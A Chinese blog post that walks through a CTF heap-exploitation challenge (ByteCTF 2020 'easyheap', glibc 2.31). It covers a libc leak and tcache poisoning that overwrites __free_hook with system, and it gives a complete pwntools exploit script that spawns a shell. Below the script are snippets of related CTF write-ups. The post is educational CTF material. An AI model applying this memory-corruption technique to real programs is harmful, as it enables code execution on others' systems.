bytectf2020 easyheap

最新推荐文章于 2022-09-25 14:17:30 发布
最新推荐文章于 2022-09-25 14:17:30 发布
阅读量3.3k 收藏
点赞数
文章标签: c语言 开发语言 后端 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuyvle/article/details/122807035
版权

做一下高版本的堆题目,2.34的glibc符号实在是搞不了,glibc in all one里面下载都是不全的,先做一下2.31的堆吧
在这里插入图片描述经典的菜单题,漏洞在new函数里
在这里插入图片描述堆限制了大小不能超过0x80,并且会有在最后的位置置零,但是这里的size_1是我们自己设置的,也就是说我们可以在任意地方写0,我们先释放7个堆块,把0x90大小的堆块放进unsorted bins里面,然后再申请出来,堆块就会把main_aren带出来,我们打印出来就能得到libc基值,但是堆块会清空原来空闲的堆块,但是和calloc不一样,这里的size是我们给的,如果我们申请0x1大小的堆块,我们申请到的是0x20大小的堆块,只会把一位清空,还有要注意的是,末尾补零会加上一个’\x00’,会导致printf不了,我们让这个补零远一点就行。
在这里插入图片描述

for i in range(8):
    add(0x80,'a'*8)
show(0)
for i in range(7):
    free(7-i)
free(0)
evil_add(0x100,1,'a')
gdb.attach(io)
show(0)
libc_base=u64(io.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-0x1ebc61
success('libc_base = '+hex(libc_base))

然后因为我们有个0任意写,我们可以攻击fd,但是我们先要生成一个地址以00为结尾的堆块
在这里插入图片描述因为2.31的特性。他cache拿取堆块的时候和arry有很大关系,如果arry是0是拿不了堆块的,反之如果arry不是0,就算tcache是空的也会拿取堆块,这里我们先free一个堆块让arry尽量打,然后攻击fd
在这里插入图片描述

下面就是简单的攻击free_hook

#!/usr/bin/python
#coding:utf-8
import os
from pwn import *
context(os='linux',arch='amd64', log_level='debug')#arch = 'i386')
filename='./easyheap'
io=process(filename)
#libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc=ELF('./libc/libc-2.31.so')
elf=ELF(filename)
s = lambda buf: io.send(buf)
sl = lambda buf: io.sendline(buf)
sa = lambda delim, buf: io.sendafter(delim, buf)
sal = lambda delim, buf: io.sendlineafter(delim, buf)
shell = lambda: io.interactive()
r = lambda n=None: io.recv(n)
ra = lambda t=tube.forever:io.recvall(t)
ru = lambda delim: io.recvuntil(delim)
rl = lambda: io.recvline()
rls = lambda n=2**20: io.recvlines(n)

cho='>> '      # choice提示语
siz='Size: '     # size输入提示语
con='Content: '         # content输入提示语
ind='Index: '      # index输入提示语
def add(size,content='',c='1'):
    sal(cho,c)
    sal(siz,str(size))
    sal(con,content)
def free(index,c='3'):
    sal(cho,c)
    sal(ind,str(index))
def show(index):
    sal(cho,str(2))
    sal(ind,str(index))
def evil_add(size_1,size,content='',c='1'):
    sal(cho,c)
    sal(siz,str(size_1))
    sal(siz,str(size))
    sal(con,content)
for i in range(8):
    add(0x80,'a'*8)
show(0)
for i in range(7):
    free(7-i)
free(0)
evil_add(0x100,1,'a')
#gdb.attach(io)
show(0)
libc_base=u64(io.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-0x1ebc61
success('libc_base = '+hex(libc_base))
add(0x60,'a'*0x60)
add(0x60,'a'*0x60)
add(0x60,'a'*0x60)
add(0x60,'a'*0x60)
add(0x60,'a'*0x60)
free(2)
free(5)
free(4)
#gdb.attach(io)
evil_add(0x4d1,0x80,'a'*80)
free(0)
free(4)
gdb.attach(io)
free_hook=libc_base+libc.sym['__free_hook']
system=libc_base+libc.sym['system']
add(0x60,p64(free_hook))
add(0x60,p64(free_hook))
add(0x60,p64(system))
add(0x80,'/bin/sh\x00')
free(6)
io.interactive()
w0nderMaker
关注
BUUCTF [ZJCTF 2019]EasyHeap
BengDouLove的博客
04-08 2748
Partial RELRO 那说明got表可写,可以通过改写got表为想要的函数,堆通常的利用方法 还是老样子,一个堆块管理系统,main函数太长了不放了,就是根据你的输入选择操作 值得一提的是有个这个 这个函数能dedaoflag吗??一会再说,反正system是有了,不用泄露libc了 1.create 可以看到,堆块最多有十个,,还是用了一张表维护着堆块的指针,,这样就让人想把这个...
CTF题解NO.00005】ByteCTF2020 - pwn - write up by arttnba3
arttnba3的博客
01-19 805
github pages address 【CTF题解NO.00005】ByteCTF2020 - pwn - write up by arttnba3[github pages address](https://arttnba3.cn/2020/11/23/CTF-0X01-ByteCTF2020-pwn/)0x00.绪论0x01.线上赛 - CTF -PWN0x00.easy_heap - null by any address + tcache poisoning漏洞:任意地址写00x01.gun
easyheap
zyh18851473527的博客
04-09 684
首先,检查一下程序的保护机制,发现没开PIE,且got表可写 然后,我们用IDA分析一下,发现没有show功能 出现了很多sub_4008F1()函数我们一个个点开看一下,发现最后一个是创建,为了便于分析我们可以改成add(n) 可以看出创建节点功能里,存在ptr[i]堆内容未初始化的漏洞经过分析,节点的结构体如下 struct Obj{ char *Data; int Size...
easy_heap
JackBoy的博客
12-04 341
easy_heap  题目保护全开,在malloc的时候存在null-by-one漏洞,由于分配的堆块的大小都是0x100(加堆头),所以null-by-one漏洞只会覆盖下个堆块的prev_inuse标志位为0。一般的利用思路是通过伪造prev_size的大小来构造overlap-chunk为所欲为,但是这种思路在这道题目里行不通,因为malloc在读取内容的时候‘\0’会截断而且堆块大小是0...
[ZJCTF 2019]EasyHeap
、moddemod
07-03 744
下面的地址主要是因为这题没开PIE,地址是不会变化的… 下图是构造的chunk写magic变量 exp from pwn import * context.log_level = 'debug' def pause_debug(): log.info(proc.pidof(p)) pause() def create(size, content): p.sendlineafter('choice :', str(1)) p.sendlineafter('Heap..
buuctf easyheap
weixin_44932880的博客
02-09 523
主要知识 堆块的结构,fastbin任意地址构造堆块的检查机制, 对题目流程的认真分析 1.检查文件没有地址偏移的保护 2.查看功能。 3.通过堆的溢出生成一块假堆块 4.假堆块可覆盖heaparray[0]为free的got表的地址. 5.通过更改heaparray[0]存的堆块的内容,将free的got覆盖为system的地址。 6.调用free函数并在前面将参数填充为"/bin/sh\x0...
ByteCTF到bypass_disable_function1
08-03
标题中的"从ByteCTF到bypass_disable_function1"指的是在网络安全竞赛ByteCTF中涉及到的一个技术挑战,即如何绕过`disable_function`的安全限制。`disable_function`是PHP配置中的一个选项,用于禁用某些可能带来...
ByteCTF之密码题lrlr
qq_33458986的博客
09-10 2621
赛题下载链接:lrlr 下面是这道题的python代码部分: from Crypto.Util.number import getPrime, bytes_to_long, long_to_bytes from Crypto.Cipher import AES import random class lrand: def __init__(self, seed): s...
ByteCTF2021 Crypto - easyxor writeup
风好衣轻
10-21 835
easyxor shift函数是个常见的移位异或操作,convert是对一个数字使用不同的key和mask进行4次移位异或,这个函数在已知key的情况下是可逆的。 encrypt函数是对明文块进行两种模式(CBC和OFB)的块加密,块长度为8,对于每一块的加密使用的就是上面的convert函数。 首先通过密文的长度可以得知一共被分成了6块;前3块明文使用OFB模式,后三块明文使用CBC模式;keys是一个长度为4的列表,列表中每个值的范围是(-32, 32),64464^4644爆破也是可以接受的。 读完题
[GFCTF 2021]Baby_Web(复现)
qq_53460654的博客
12-20 4784
打开环境 所以要我们读取上层目录的某个文件 所以我想应该会存在任意文件读取和路径穿越漏洞 然后标签有CVE-2021-41773 所以直接github拿到这个漏洞的 工具 payload 我们来读一下index.php.txt <?php error_reporting(0); define("main","main"); include "Class.php"; $temp = new Temp($_POST); $temp->display($_GET['filename']); ?
2020ByteCTF——WriteUp
weixin_44503995的博客
10-29 1704
2020ByteCTF——WriteUp 2020bytectf 官方部分wp https://github.com/ctfwiki/ctf_game_history/blob/master/2020/ByteCTF.md ctf大佬个人补充wp https://bytectf.feishu.cn/docs/doccnqzpGCWH1hkDf5ljGdjOJYg 请保持自己的决心!
[ByteCTF2020]WP兼个人笔记总结
Y4tacker的博客
10-29 4319
文章目录前言Wallbreaker 2020douyin_video(攻破中)参考链接 前言 这是我第一次参加的比赛,两天时间一道题都没做出来,害有点小难受,希望能够将WP记录好,方便以后的复习查阅 Wallbreaker 2020 官方的预期解还没有出来难受,期待决赛后出预期解!!! 一开始我自己打开题目发现看起来不是特别难的亚子,首先查看了phpinfo, 接下来我进入了蚁剑,但是发现除了html目录下可读,tmp目录下可读可写, 然后我想到了利用glob进行文件的读取http://123.57.9
[BUUCTF]PWN——[ZJCTF 2019]EasyHeap
mcmuyanga的博客
12-16 479
[ZJCTF 2019]EasyHeap 附件 步骤: 例行检查,64位程序 试运行一下看看程序大概执行的情况,经典的堆块的菜单 64位ida载入,首先检索字符串,发现了读出flag的函数 看一下每个选项的函数 add 这边size的大小由我们输入控制,heaparray数组在bss段上存放着我们chunk的指针 edit,简单的根据指针修改对应chunk里的值,但是这里的size也是由我们手动输入的,也就是说只要我们这边输入的size比add的时候输入的size大就会造成溢出 delete,释
BUUCTF-[ZJCTF 2019]EasyHeap1
最新发布
Rt1Text的博客
09-25 987
经典堆菜单。
roarctf_2019_easyheap(文件描述符1关闭后仍然可以交互)
seaaseesa的博客
04-17 616
roarctf_2019_easyheap 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 最开始的时候,我们可以在bss段输入一些数据,这意味着,我们可以在bss段伪造一个chunk show功能必须要满足条件才能使用 Free后没有清空指针,因此存在double free。 666功能也可以创建和free堆,但是有次数限制,但是这个次数限制也存在漏洞,即q...
buuctf [ZJCTF 2019]EasyHeap
weixin_45677731的博客
08-24 952
这题只有add,edit,delete三个主体部分,没有show的部分 create_heap函数,chunk的指针保存在bss段的heaparray数组处 edit_heap函数,注意这里输入的数据长度是可以自己设置的,就可以随意溢出了 delete_heap函数 除此之外,还有这样一个l33t函数: 在程序中,你只要满足一定的条件,是可以运行这个函数的,我猜测在[ZJCTF 2019]比赛进行的时候可能这个函数是可以利用的,但现在在buu上面是用不了的,flag文件的目录不对。不过,这个sys
npuctf_2020_easyheap
qq_51687381的博客
07-27 281
这题的结构,像是hacknote 和之前一个easyheap的融合。 但是漏洞利用手法不太一样。之前的一个easyheap是利用fastbin里面的一种漏洞。伪造一个fake chunk。(这道题的原因是因为,就算伪造了一个fake chunk ,我们malloc时也无法利用它) 这次的漏洞:是将control chunk 和content chunk 对调,然后对control chunk攻击。 from pwn import * elf = ELF("./npuctf_2020_easyhea
PHP漏洞规避:从ByteCTF实战到disable_function技巧
在"从ByteCTF到bypass_disable_function"这篇文章中,作者Z3ratu1分享了他的学习过程和在IT竞赛中的经验。文章起源于对ByteCTF比赛中一道名为"bypass_disable_function"的PHP题目探索,这促使作者深入研究了PHP中的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值